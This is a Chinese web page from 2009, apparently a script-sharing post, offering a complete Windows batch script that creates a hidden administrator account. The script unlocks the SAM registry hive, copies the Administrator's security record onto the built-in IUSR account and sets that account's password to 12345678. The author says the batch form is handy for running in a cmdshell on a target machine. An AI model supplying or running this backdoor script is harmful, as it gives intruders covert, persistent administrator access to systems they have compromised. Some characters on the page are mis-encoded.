windows 復(fù)制隱藏帳號完全批處理
更新時間:2009年09月30日 12:19:18 作者:
其實(shí)就是注冊表里復(fù)制管理員權(quán)限到普通用戶那個操作,不過畢竟批處理容易在cmdshell里實(shí)現(xiàn),貼出來吧。
復(fù)制代碼 代碼如下:
echo off
setlocal enabledelayedexpansion
echo %computername%
echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%
rem unicode ->ascii
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem find IUSR_%computername% 的對應(yīng)id
for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b
del /q "%windir%\..\2.reg"
rem export administrator register
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem replace 1fx->iusr_id
for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do (
for /f "tokens=*" %%j in ("%%i") do (
set TMP=%%j
set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!"
echo !TMP!>>%windir%\..\1.reg
)
)
regedit /s %windir%\..\1.reg
del /q %windir%\..\1.reg
del /q %windir%\..\2.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
del /q "%windir%\..\1.reg"
net user IUSR_%computername% 12345678
克隆出來的用戶名是固定的,隨便變換的話要改代碼
相關(guān)文章
Chcp 顯示活動控制臺代碼頁數(shù)量,或更改該控制臺的活動控制臺代碼頁
Chcp 顯示活動控制臺代碼頁數(shù)量,或更改該控制臺的活動控制臺代碼頁...2007-09-09通過批處理實(shí)現(xiàn)刪除運(yùn)行、查找等處的歷史記錄的代碼
刪除運(yùn)行、查找等處的歷史記錄,其實(shí)就是通過操作批處理實(shí)現(xiàn),具體的介紹參考下面的介紹2012-05-05BAT腳本之核心技巧:詳解IF語句的使用方法與實(shí)例
如果你想要在Bat編程語言中使用條件語句,那么這篇指南將會為你介紹如何使用IF語句,?IF語句是任何編程語言中都不可或缺的一部分?-?它使您能夠基于特定的條件執(zhí)行某些代碼塊或跳過它們,在這篇簡短的指南里,我們將向你展示如何在Bat中編寫IF語句并給出一些示例來說明其用法2024-02-02